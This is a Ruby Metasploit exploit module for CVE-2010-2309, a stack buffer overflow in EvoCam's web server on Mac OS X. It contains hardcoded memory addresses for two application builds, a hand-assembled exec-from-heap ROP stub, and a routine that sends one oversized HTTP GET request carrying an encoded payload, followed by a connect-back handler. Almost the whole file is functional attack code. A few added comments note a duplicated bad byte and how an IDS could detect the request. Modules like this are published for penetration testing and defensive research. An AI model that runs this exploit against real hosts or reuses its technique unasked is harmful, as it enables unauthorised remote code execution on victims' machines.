##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2010-2309: stack buffer overflow in the HTTP server
# bundled with EvoCam on Mac OS X (3.6.6 / 3.6.7; fixed in 3.6.8 per the
# description below). The trigger is a single oversized HTTP GET request line
# sent over plain TCP (Msf::Exploit::Remote::Tcp), default port 8080.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  # Registers module metadata (name, references, payload constraints, targets)
  # and the RPORT option. Everything here is static configuration; the
  # per-target hash is read back via `target[...]` in the methods below.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MacOS X EvoCam HTTP GET Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in the web server provided with the EvoCam
          program for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload
          from the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6,
          3.6.7, and possibly earlier versions as well. EvoCam version 3.6.8 fixes the vulnerability.
        },
        'Author' => [
          'Paul Harrington', # Original Exploit Author and MSF Module
          'dookie', # MSF Module Assistance
        ],
        'Platform' => 'osx',
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2010-2309'],
          ['OSVDB', '65043'],
          ['EDB', '12835'],
        ],
        'Payload' => {
          'Space' => 300,
          # NOTE(review): "\x0c" is listed twice; harmless, but the duplicate
          # can be dropped.
          'BadChars' => "\x00\xff\x09\x0a\x0b\x0c\x0c\x0d\x20",
          'StackAdjustment' => -3500,
        },
        'Privileged' => false,
        # Each target carries fixed absolute addresses. They are only valid for
        # the exact OS release and application build named in the target
        # string; the two targets differ solely in 'Offset'.
        'Targets' => [
          [
            'Mac OS X 10.5.8 x86, EvoCam 3.6.6',
            {
              'Arch' => ARCH_X86,
              'Offset' => 1560, # length of filler placed before the stub (see #exploit)
              'Writable' => 0x8fe66448,
              'setjmp' => 0x8fe1cf38,
              'strdup' => 0x8fe210dc,
              'jmp_eax' => 0x8fe01041
            }
          ],
          [
            'Mac OS X 10.5.8 x86, EvoCam 3.6.7',
            {
              'Arch' => ARCH_X86,
              'Offset' => 1308, # length of filler placed before the stub (see #exploit)
              'Writable' => 0x8fe66448,
              'setjmp' => 0x8fe1cf38,
              'strdup' => 0x8fe210dc,
              'jmp_eax' => 0x8fe01041
            }
          ],
        ],
        'DisclosureDate' => '2010-06-01',
        'DefaultTarget' => 1, # index 1 == the EvoCam 3.6.7 target
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8080),
      ]
    )
  end

  # Builds the binary stub that is placed right after the filler in the GET
  # request line. It concatenates two small x86 fragments with the per-target
  # addresses from the 'Targets' table, each packed as a 32-bit little-endian
  # value ('V'). The byte layout is position-sensitive; do not reorder.
  #
  # @return [String] the stub bytes (the last assignment is the implicit
  #   return value; the local name only documents what is being built)
  def make_exec_payload_from_heap_stub()
    frag0 =
      "\x90" + # nop
      "\x58" + # pop eax
      "\x61" + # popa
      "\xc3" # ret

    frag1 =
      "\x90" + # nop
      "\x58" + # pop eax
      "\x89\xe0" + # mov eax, esp
      "\x83\xc0\x0e" + # add eax, byte +0xe  (encoding 83 c0 0e; earlier comment said +0xc)
      "\x89\x44\x24\x08" + # mov [esp+0x8], eax
      "\xc3" # ret

    # Per-target constants; all four are required keys of the target hash.
    setjmp = target['setjmp']
    writable = target['Writable']
    strdup = target['strdup']
    jmp_eax = target['jmp_eax']

    exec_payload_from_heap_stub =
      frag0 +
      [setjmp].pack('V') +
      [writable + 32, writable].pack("V2") +
      frag1 +
      "X" * 20 +
      [setjmp].pack('V') +
      [writable + 24, writable, strdup, jmp_eax].pack("V4") +
      "X" * 4
  end

  # Sends one HTTP/1.0 GET whose request path is: 'Offset' bytes of random
  # upper-case letters, the stub from #make_exec_payload_from_heap_stub, two
  # NOPs, then the encoded payload. The socket is closed immediately after the
  # write; no response is read.
  #
  # Detection note: the request line is abnormally long and mixes a run of
  # upper-case ASCII with raw binary bytes before " HTTP/1.0" — a pattern that
  # an IDS/WAF rule on request-line length or non-printable bytes will catch.
  def exploit
    connect

    offset = target['Offset']

    buffer = "GET "
    buffer << rand_text_alpha_upper(offset)
    buffer << make_exec_payload_from_heap_stub()
    buffer << "\x90\x90"
    buffer << payload.encoded
    buffer << " HTTP/1.0\r\n\r\n"

    sock.put(buffer)
    sock.close

    # handler() is invoked after the socket is closed; the payload connects
    # back (or listens) independently of this HTTP connection.
    handler()
    disconnect
  end
end